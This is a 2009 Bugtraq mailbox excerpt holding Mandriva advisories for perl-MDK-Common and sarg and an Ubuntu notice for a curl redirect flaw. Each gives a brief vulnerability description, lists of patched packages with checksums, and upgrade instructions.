List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13483 invoked from network); 11 Mar 2009 19:29:04 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:072 ] perl-MDK-Common
Date: Wed, 11 Mar 2009 20:29:00 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhU6u-0002dS-Sa@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:072
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : perl-MDK-Common
 Date    : March 10, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Some vulnerabilities were discovered and corrected in perl-MDK-Common:
 
 The functions used to write strings into shell like configuration files
 by Mandriva tools were not taking care of some special characters. This
 could lead to some bugs (like wireless keys containing certain
 characters not working), and privilege escalation. This update fixes
 that issue by ensuring proper protection of strings.
 
 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 255c507faad86d74633fea56446b9f89  2008.0/i586/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm 
 4f83f9416037cd3775b255511ed99aaf  2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6ac913c2551578cbb10713db5141ab72  2008.0/x86_64/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm 
 4f83f9416037cd3775b255511ed99aaf  2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 8f3509691549b62e7da2682984f4c888  2008.1/i586/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm 
 f1919920b9fcca35dcd0033f0a19e236  2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 4c25f8f946005b77d7581639ca544ae8  2008.1/x86_64/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm 
 f1919920b9fcca35dcd0033f0a19e236  2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 31fda6d87bf3ef9dfb9d9e4919c62f75  2009.0/i586/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm 
 073a35460e25c90234c75a66d1779609  2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 93b0176cd4b5856e2a02f4af15a7f002  2009.0/x86_64/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm 
 073a35460e25c90234c75a66d1779609  2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm

 Corporate 3.0:
 df26c59475110bd53b5f288f11a53d57  corporate/3.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
 0d7c3fa75f2e835ab1237fda5cc10387  corporate/3.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm 
 dc24b24dbf8a233cbd10f92ab8a3f5a4  corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c6c00d568f5e7f48bcf8769a75dfaef2  corporate/3.0/x86_64/perl-MDK-Common-1.1.11-3.1.C30mdk.x86_64.rpm
 f16597e275371d2f40d8ec9723b6f770  corporate/3.0/x86_64/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.x86_64.rpm 
 dc24b24dbf8a233cbd10f92ab8a3f5a4  corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm

 Corporate 4.0:
 b53e8db2c3804b36c17921bd886b2c23  corporate/4.0/i586/perl-MDK-Common-1.1.24-1.1.20060mlcs4.i586.rpm
 72122ed2463be591ea5c8d3763aaac1a  corporate/4.0/i586/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.i586.rpm 
 97b7bbf36c56e079497bb15a38cdd06e  corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 5476a172d15b9985491cee4b5ba914d4  corporate/4.0/x86_64/perl-MDK-Common-1.1.24-1.1.20060mlcs4.x86_64.rpm
 ecea123e2aad11416a8abd079a5b93ec  corporate/4.0/x86_64/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.x86_64.rpm 
 97b7bbf36c56e079497bb15a38cdd06e  corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 d1b3d790798d9252553c95e4fe1e90e9  mnf/2.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
 219d2d7cf2b4c745b2952ee75a2009e1  mnf/2.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm 
 f2c76192a4d62ae3702de73abda0884e  mnf/2.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJt+NbmqjQ0CJFipgRAvINAKC3d7iuv+HEVUIRh2Rn8BggyZ10rACfX9f1
UXe9rhwuBhlRn6iP5nwztoE=+T8R
-----END PGP SIGNATURE-----

From - Thu Mar 12 11:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006915
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39722-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B1918ED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:44:41 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 374A214372D; Thu, 12 Mar 2009 08:13:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31753 invoked from network); 11 Mar 2009 21:45:13 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:073 ] sarg
Date: Wed, 11 Mar 2009 22:45:01 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhWEX-000361-Ff@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:073
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : sarg
 Date    : March 10, 2009
 Affected: 2008.0, Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Various stack buffer overflows were discovered and corrected in sarg:
 
 Additionally the previous release fixed CVE-2008-1922
 
 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1922
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 15220d1d19df7866158faf5691091db1  2008.0/i586/sarg-2.2.5-0.3mdv2008.0.i586.rpm 
 e90b1965c741b0411cc26dc0a3076f43  2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 72be1a3b7331854ec27678985fa11fa9  2008.0/x86_64/sarg-2.2.5-0.3mdv2008.0.x86_64.rpm 
 e90b1965c741b0411cc26dc0a3076f43  2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm

 Multi Network Firewall 2.0:
 a16192924303d6a30611345c0cdd5226  mnf/2.0/i586/sarg-2.2.5-0.2.M20mdk.i586.rpm 
 076cfa3458dbc3c71eda0ccfe948c7fb  mnf/2.0/SRPMS/sarg-2.2.5-0.2.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJuAW5mqjQ0CJFipgRAsT4AJ9w/38BPgfFfnwBIVKWC+Z5piSEXACeNAKl
Unu1AVagIifyvkrR/7PV/ZI=aSyT
-----END PGP SIGNATURE-----

From - Thu Mar 12 12:01:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006916
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39730-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4349CED501
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:53:53 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B2DB1237533; Thu, 12 Mar 2009 08:16:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17484 invoked from network); 12 Mar 2009 12:31:21 -0000
Delivered-To: unknown
X-Bluewin-Spam-Analysis: v=1.0 c=1 a�6q0cyCUc8QNek+tXvRSQ==:17 a=fxJcL_dCAAAA:8 a=OyHcUBRH04IW4ol2diAA:9 a=uHvUuZ9nVv53fTq_MNzbFbL44EYA:4 a=tQPsmlJHCTUA:10
X-Bluewin-Spam-Score: 0
X-FXIT-IP: IPv4[91.189.94.204] Epoch[1236109853]
Subject: [USN-726-1] curl vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -17.9
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.146
Date: Tue, 03 Mar 2009 14:44:12 -0500
Message-Id: <1236109452.6589.18.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.25.91 
X-Mailman-Approved-At: Tue, 03 Mar 2009 19:48:25 +0000
Cc: full-disclosure@lists.grok.org.uk,
"bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
X-BeenThere: ubuntu-security-announce@lists.ubuntu.com
X-Mailman-Version: 2.1.8
Reply-To: ubuntu-users@lists.ubuntu.com,
Ubuntu Security <security@ubuntu.com>
Content-Type: multipart/mixed; boundary="==============�12105205218476806=="
Mime-version: 1.0
Sender: ubuntu-security-announce-bounces@lists.ubuntu.com
Errors-To: ubuntu-security-announce-bounces@lists.ubuntu.com
Status:   


--==============�12105205218476806=Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-vVlpg2N7rxwQ1FwKUF+4"


--=-vVlpg2N7rxwQ1FwKUF+4
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-726-1             March 03, 2009
curl vulnerability
CVE-2009-0037
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libcurl3                        7.15.1-1ubuntu3.1
  libcurl3-gnutls                 7.15.1-1ubuntu3.1

Ubuntu 7.10:
  libcurl3                        7.16.4-2ubuntu1.1
  libcurl3-gnutls                 7.16.4-2ubuntu1.1

Ubuntu 8.04 LTS:
  libcurl3                        7.18.0-1ubuntu2.1
  libcurl3-gnutls                 7.18.0-1ubuntu2.1

Ubuntu 8.10:
  libcurl3                        7.18.2-1ubuntu4.1
  libcurl3-gnutls                 7.18.2-1ubuntu4.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that curl did not enforce any restrictions when following
URL redirects. If a user or automated system were tricked into opening a URL to
an untrusted server, an attacker could use redirects to gain access to abitrary
files. This update changes curl behavior to prevent following "file" URLs after
a redirect.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1.diff.gz
      Size/MD5:   187821 98a6bc2adb5c5673bdf39e10459be0e8
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1.dsc
      Size/MD5:      946 54356fc9d1f2f629db92aec10f15ad52
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1.orig.tar.gz
      Size/MD5:  1769992 63be206109486d4653c73823aa2b34fa

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dev_7.15.1-1ubuntu3.1_all.deb
      Size/MD5:    31260 e1a1c7938bbc15a8f1183fe1d6d0af0a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   169568 1315f552c57d7db1315f81b41589792c
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   540736 bb54db6af7f71e8098b99f57c55a8c03
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   717326 74244221991d13b3e27d7600b25cc667
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   167960 0d960ee5cb9c386af7730dd6985e519e
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   724246 a35139c3af268cb40a64b2d4562c239e
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   172910 33529da99980d7c599c1ddbf49a7a298

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   168448 3ff82ec8fbffb489c198ef86ad45155b
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   506770 10c355570dcb3812efa661f3359792fa
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   700624 d9ed3ac37839ed446dd2d19f4c0ccac1
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   160502 7325d0cd0802f12340de1e5ff8fc94ad
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   705276 442b603f3bef1bb6b76cb475108d0869
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_i386.deb
      Size/MD5:   165456 52191a45a9ccfb55dfa95a5d6059c4c4

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   172084 3b8d50cd83bce1fbf4db132ac6b5fcf2
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   542256 f038486866f70fd91641a338684c9fd7
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   723702 ab81371909385b48de743ff8c6bdef1e
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   170316 b131cc76e2315a6969e5d842ee00ac7d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   729156 ecb7523175cc86845a65a45e584c52f4
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_powerpc.deb
      Size/MD5:   174808 75929f5b8f8665d595d71b1477428fe8

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   169262 d1227121940771c773000adf86cb2b25
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   510838 cedeacff8c06c39c973cb49e14098a72
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   710240 a69b147b9aa4e84755128b20cf8d6cc0
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   163088 2dc3c7c08147eb59e3b10df00a84380d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   714840 ef9596a90e8f5d3872dbb533c2e3a785
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_sparc.deb
      Size/MD5:   167244 0eb1ef9b9f24c1ce216bfac5ac61a770

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1.diff.gz
      Size/MD5:    23038 ec29fe4a6ce15381ee4d18977a01cf54
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1.dsc
      Size/MD5:     1070 ee6f69c49d16d34809984d41ba9a95d9
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4.orig.tar.gz
      Size/MD5:  2127522 b8f272cfe98fd5570447469e2faea844

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   175802 1031a8edbe06cac94c392dedc7453fe5
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:  1030904 97008fb6866a84bfc1bfc6aadc387c37
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   180212 8879fd596ec6d374ecc3db7c590a4dee
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   186854 216542e4ee0aa37b12dfceb9f782431f
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   828040 3bef020322ca21c8673b55bcde5a7555
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_amd64.deb
      Size/MD5:   835418 03a845d4637949826e4b606675643351

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   174936 a69d59cba07ca9611470fa45c441d41f
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   998270 4adafc7307dec5a9194e53d27046862a
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   176140 63ce96a012b6b57e14ada06f633293f8
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   182128 cc373dd8b1383abc9647b2755dcc82c2
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   802764 b4f2f06c793123ffc85ecd754d27a799
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_i386.deb
      Size/MD5:   808706 4cdc8ddd315dbd125b6dd6fd9254f584

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   174826 826bd0dc3bab6c9df46b737c99a4cc12
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:  1016026 54999bbac5f7b80c03a450d0fa782e2c
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   174294 4b881eab13f96f101f233b8d8066a1eb
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   180832 7e9738237d5a15b0117463d9c9067925
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   800482 8f79859acd3d9c5656c8776bd595aa17
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_lpia.deb
      Size/MD5:   806612 d310180304c4688ad36b734a929514aa

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   179486 e0fb5643133b30cc3e258820cf17d67d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:  1045612 845b188923e649bc8a165b8356e7f406
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   187794 cd8cd13657a67c0367bae7c821075cbb
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   193612 d4178d220ba2d1e12005387e9226a27b
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   826054 ce04418fbb88124acc4705e9372ecd30
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_powerpc.deb
      Size/MD5:   831906 3a8efee4daf4b2ca73165bd2ec1e2883

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   175644 6b184238aa16330227fa2ef555b6e558
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   990958 66b0b3669cba60f631ed6a0a24617188
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   174762 e8750cc8896cfcffce4815777ac3caee
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   179512 c0e79f63b732fbbc405652f107878b84
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   808072 684fb0a815911676557b5debd393a1fe
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_sparc.deb
      Size/MD5:   814506 1aa48c17a5be7a7373b045abfc18da3d

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1.diff.gz
      Size/MD5:    23694 d86f917e0253ba822db6d2424798463c
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1.dsc
      Size/MD5:     1101 1a3e33be24181c7ffc8f7b60816e249d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0.orig.tar.gz
      Size/MD5:  2285430 76ff5a7fa2e00b25ded5302885d4c3e2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   197866 101c380ab9d9ab90cd8eb29feb9b1afc
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:  1054384 bc98cdd6d1571106757d2411ad6ffd3c
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   202642 f663841bc8e03556b2d41ef1d7260930
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   209456 e8acd7503ad26b01aae5375b90178a48
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   896296 fd68ba64689210d59e867787ba4abb20
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_amd64.deb
      Size/MD5:   904552 7644776a5d3a3b1922a3507a37ec05dc

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   197074 00eb30ecbc6793f1d10bed5c8bbf5bf5
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:  1039734 541d32169bfe1529dd2d4745a1226eb1
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   198480 b4ca187d0408dc35836646c5f966bf90
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   205782 c61cf64efc7baa7cb37a03bed19cfa6a
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   870314 7e275b66161a6cf9c32fbdc4750805eb
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_i386.deb
      Size/MD5:   877390 b8889ec5febb2da66b0dae49295e6844

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   196994 f85f088f37ed84c756fd75a5ba9c1829
